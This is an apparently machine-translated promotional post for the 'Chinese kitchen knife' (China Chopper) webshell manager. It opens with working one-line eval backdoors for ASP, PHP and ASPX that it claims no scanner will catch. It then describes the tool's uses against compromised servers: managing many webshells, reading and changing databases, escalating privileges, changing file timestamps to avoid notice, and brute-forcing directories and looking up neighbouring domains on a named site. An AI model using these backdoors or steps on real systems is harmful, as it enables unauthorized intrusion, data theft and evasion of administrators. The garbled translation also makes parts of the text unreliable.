Chinese kitchen knife and usage

Chinese kitchen knife and usage

[Attach] 268 [/Attach]
ASP environment: <% eval request ("A") %>

PHP environment: <? PHP @ eval ($ _ post ['a']);?>

Aspx environment: <% @ page Language = "jscript"> <% eval (request. item ["A"], "unsafe"); %>

Is it shocking? It is incredible. Yes, this is also my idea when I first came into contact. In these three statements, it is a well-known "Chinese kitchen knife ", can I collect scripts and backdoors on hundreds of platforms and in various environments instead of me for a few years ?, As it turns out, I am wrong. The Chinese kitchen knife can not only replace those backdoors, but its functions are beyond my imagination. Let me explain it slowly.

1. in the most basic sense, do your scripts often get killed? How do you get killed after deformation? If the server is killed, the Administrator will find that your permissions are lost, it makes you cry. One-sentence webshell of the kitchen knife can avoid this problem. There is only one line of code that will never be scanned and killed.

2. are you depressed? Your backdoors are uploaded to the server and you don't even know your mother. The framework is deformed, the font is changed to the box, and the menu is invalid. This is caused by incompatibility of the system language, the kitchen knife is compiled in uincode mode and supports multi-language input display. There is no compatibility problem at all.

3. Do you have a lot of webshells? Every time you take the notepad and write it down. When you need it, you will go over it for another half a day, which makes you very tired and impatient. With the "kitchen knife", you can easily manage your webshell. All the records are stored in the encrypted local database, and webshell classification is supported, so that you can manage them in a well-organized manner. The kitchen knife not only has a temporary lock function, so that when you leave your computer, it will not be stolen by others, but also has the encryption function, without losing the correct password, Hoho, it's useless to steal your data.

4. Let's talk about database management. This is the most powerful function of the kitchen knife. I am proficient in the mainstream databases of various platforms and write this function to the fullest extent. It supports databases such as MySQL, MSSQL, Oracle, infomix, and access. It supports a database operation interface that is not the most important, powerful, and humanized, built-in Common Database statements, intuitive browsing of table column names, automatic display of table names, column names, query statements, a very user-friendly design, more built-in many self-built functions, cainiao who do not know the database can easily access the data in the database. Let's talk about the tips for "kitchen knife" database management. For access databases, you can use the webshell operation interface of the kitchen knife, right-click the MDB file and click access
Management, you can directly access the ACCESS database operation interface !!

5. in addition, the elevation of permission is always of the greatest concern to webshell. When it comes to elevation of permission, we cannot talk about cmd execution on webshell, some friends do not know about the custom cmd path function of the kitchen knife. There are two ways to set the specified cmd path. One is to enter setp D: \ mongo.exeon the CMD operation interface, and then upload cmd.exe to the directory, right click and click virtual terminal file to enter the custom cmd. the command line of the EXE path is the same, and then a tips for cmd. In the command line of the kitchen knife, you can use commands such as CD to jump to the directory for convenience !! Well, In addition, the new version adds frequently-used Directory management functions. You can add frequently-used Directories Or Directories With Elevation of Privilege To the menu knife, which facilitates Elevation of Privilege or daily work, isn't it more powerful than the script Backdoors that fix the elevation directory? haha.

6. the webshell file function of the kitchen knife is also very user-friendly. the icons of folders and files are fully modeled on windows, and the file date, file size, and file permissions are clear at a glance, in particular, it is very convenient to modify the file time. Right-click the file to modify the time and modify the file time. Then, in the file time column, enter the time and press Enter, the modification is complete. Of course, there are also new, delete, upload, download, and edit features in the file management of the kitchen knife, which are similar and will not be detailed in detail. However, there is a function that should be highlighted, that is, the directory cache function. The kitchen knife can cache all browsed webshell directories locally, so that the next visit can be more convenient, the most important thing is that when your permissions are lost one day, at least you still have the file directory structure of the other server to facilitate further penetration.

Now that we have all the webshell script functions, some special kitchen knife functions are very special and practical. The predecessor of the kitchen knife is the webshell manager. Combined with the advantages of several tools such as the author's Web management software, it is a collection of big kill tools.

1: crawlers. I like WVS very much. For Web security, it is very powerful. I like a feature in it, directory crawling, the file directory structure of the Web site can be arranged in a very intuitive form for convenient analysis. I was pleasantly surprised to find that the kitchen knife also has this function, called spider crawling.

Usage:

{Spider} {URL: http://www.xunest.com /}

Set crawling range

{Spider} {URL: http://www.xunest.com/} {range: xunest.com}

Similar to the WVS function, when I uploaded a webshell image last time, I did not know the directory to which the script backdoor was sent. As a result, I found it powerful by using the spider crawling function of the kitchen knife.

2: Side-note query. During Penetration, it is critical to bypass the attack. I do not know how many major websites are under attack from other neighbors. You have seen all the domain names of the same server, and you have seen no domain names of the same C segment.

Usage:

Check the bound domain name of a single IP Address
{Reverse_ip} {URL: http://www.xunest.com /}
Scan the Web server opened in section C and query the bound Domain Name
{Reverse_ip_c} {URL: http://www.xunest.com /}

3: dictionary cracking function. Do you like the directory scanning function of WebTool very much? Since the kitchen knife is the owner of the group, this function is naturally not missing and the function is more powerful.

Usage:

{Crack} {URL: http: // % S/admin/} {flag: HTTP/1.1 200} {dict: list.txt}
{Crack} {URL: http: // % S/admin/} {flag :!! HTTP/1.1 404} {dict: list.txt}
{Crack} {URL: http://www.xunest.com/%s/} {flag: successfully} {dict: list.txt}

% S is a row in dict, flag: Followed by a specific keyword in the returned data (including the HTTP header), add !! If it does not contain the keyword "true", otherwise the keyword "true" and "list.txt" are files in the current directory, which can be set to an absolute path. Note: do not include too many rows.

The directory brute-force cracking function is flexible and powerful. First, you can determine whether the directory exists based on the returned data packets and then crack the parent directory of a known directory. For example, if you know that your directory is guanli, but you do not know which Directory The guanli directory is in, then you can

{Crack} {URL: http://www.xunest.com/%s/guanli/} {flag: HTTP/1.1 200} {dict: list.txt}

Actually, the kitchen knife is still a browser ....., really, don't lie to you. The browser function of the kitchen knife is very simple, but very practical. It can be very convenient to prohibit or enable website script and control execution, picture display switch, the most convenient, it is also very important for cookies to be edited. The browser of the kitchen knife can be submitted directly by post. What is the use of this function? I believe that I don't need to talk about it. The other one is custom JS, which is also said to be very powerful, but I haven't used this function yet.

To sum up, the kitchen knife has been improving, updating, and developing to the present, it is not just a webshell manager. It can be said that it is a collection of kill machines, even if it completely abandons the webshell management function, kitchen knife is also a very good browser, a very good background scanning tool, a very good cookie editing and submission tool, a very good file management tool, a very good bypass software, it is not only convenient for hackers and friends, but also very convenient for webmasters. After all, the file management function and upload and download function are more intuitive and important than FTP, it is really unprecedented, and it is very convenient to come later. We strongly recommend that you use it.

With the next development plan provided by the author, the kitchen knife will support JSP, CFM, and so on. It is more flexible. We also consider opening the kitchen knife protocol and interface. In this way, you can write plug-ins freely, it is not limited to a backdoor like eval. In addition, the kitchen knife will continue to be people-oriented and user-friendly. It will be more flexible. You are welcome to give your comments.

The Chinese kitchen knife official website contains detailed software and can be downloaded to the latest version.